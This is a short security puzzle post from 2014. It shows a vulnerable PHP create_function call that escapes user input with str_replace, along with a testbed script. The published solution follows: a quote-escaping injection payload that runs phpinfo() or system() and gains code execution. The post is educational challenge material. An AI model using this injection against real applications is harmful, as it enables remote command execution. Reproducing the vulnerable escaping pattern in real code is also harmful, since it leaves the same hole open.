Hi guys,
Sebastian from @internetwache here. 

I discovered the following PHP sourcecode in a webapplication:

***
create_function('','return md5(\''.str_replace("'", "\\'", $arg).'\');');
***

$arg is an user-controlled parameter. 

Try to make a RCE out of it (no solution guaranteed)!

If you have a solution, contact us at @internetwache.

Testbed for you:

***
cat /tmp/test.php
<?php
$arg = $argv[1];

echo "Payload:\n";
echo 'return md5(\''.str_replace("'", "\\'", $arg).'\');';
echo "\nExec:\n";
$foo = create_function('','return md5(\''.str_replace("'", "\\'", $arg).'\');');

echo $foo();

?>
***

Use it like this:

***
> php /tmp/test.php "foo"
Payload:
return md5('foo');
Exec:
acbd18db4cc2f85cedef654fccc4a4d8
***

Have fun!

~ Sebastian

=========SOLUTION=========

First one to solve it was Jakub Żoczek (@zoczus):

- Payload: \'.phpinfo());}//
- Works on cmd-line and apache
- Screenshot: http://i.imgur.com/iis47XM.png

***
> php /tmp/test.php "\\'.system(\"date\"));}//"
Payload:
return md5('\\'.system("date"));}//');
Exec:
Mi 8. Okt 14:09:24 CEST 2014
e928add3e8dc71d4768ad85338b90309⏎  
***

Well done!